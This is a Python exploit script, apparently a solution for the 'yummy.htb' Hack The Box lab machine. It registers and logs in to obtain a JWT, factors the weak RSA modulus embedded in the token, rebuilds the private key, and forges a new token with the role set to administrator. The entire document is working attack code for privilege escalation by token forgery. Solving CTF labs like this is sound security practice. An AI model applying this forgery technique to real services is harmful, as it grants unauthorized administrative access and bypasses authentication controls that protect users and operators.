import sage.all
import requests
import jwt
import base64
import json
import os
from copy import deepcopy

base_url = 'http://yummy.htb'

if __name__ == '__main__':
    s = requests.Session()
    data =  {
        'email': 'test12@test.com',
        'password': 'test12'
    }
    s.post(f'{base_url}/register', json=data)
    ret = s.post(f'{base_url}/login', json=data)
    cookies = ret.cookies
    tok = cookies['X-AUTH-Token']
    print(f'Got token: {tok}')
    header = jwt.get_unverified_header(tok)
    print(f'Header: {header}')
    payload = tok.split('.')[1]
    payload = json.loads(base64.b64decode(payload + '==').decode())
    rsa_info = payload['jwk']
    n = int(rsa_info['n'])
    e = int(rsa_info['e'])
    factors = sage.all.factor(n)
    p = factors[0][0]
    q = factors[1][0]
    phi = (p-1)*(q-1)
    d = pow(e, -1, phi)
    os.popen(f'python3 rsatool.py -n {n} -p {p} -q {q} -e {e} -f PEM -o privkey.pem')
    with open('privkey.pem', 'rb') as f:
        privkey = f.read()
    print(f'Privkey: {privkey}')
    os.popen('openssl rsa -in privkey.pem -pubout > mykey.pub').read()
    with open('mykey.pub', 'rb') as f:
        pubkey = f.read()
        print(f'Pubkey: {pubkey}')
    jwt.decode(tok, pubkey, algorithms=['RS256'])
    new_payload = deepcopy(payload)
    #new_payload['role'] = payload['role'].replace('customer', 'administrator')
    new_payload['role'] = 'administrator'
    new_tok = jwt.encode(new_payload, privkey, algorithm='RS256')
    print(f'New token: {new_tok}')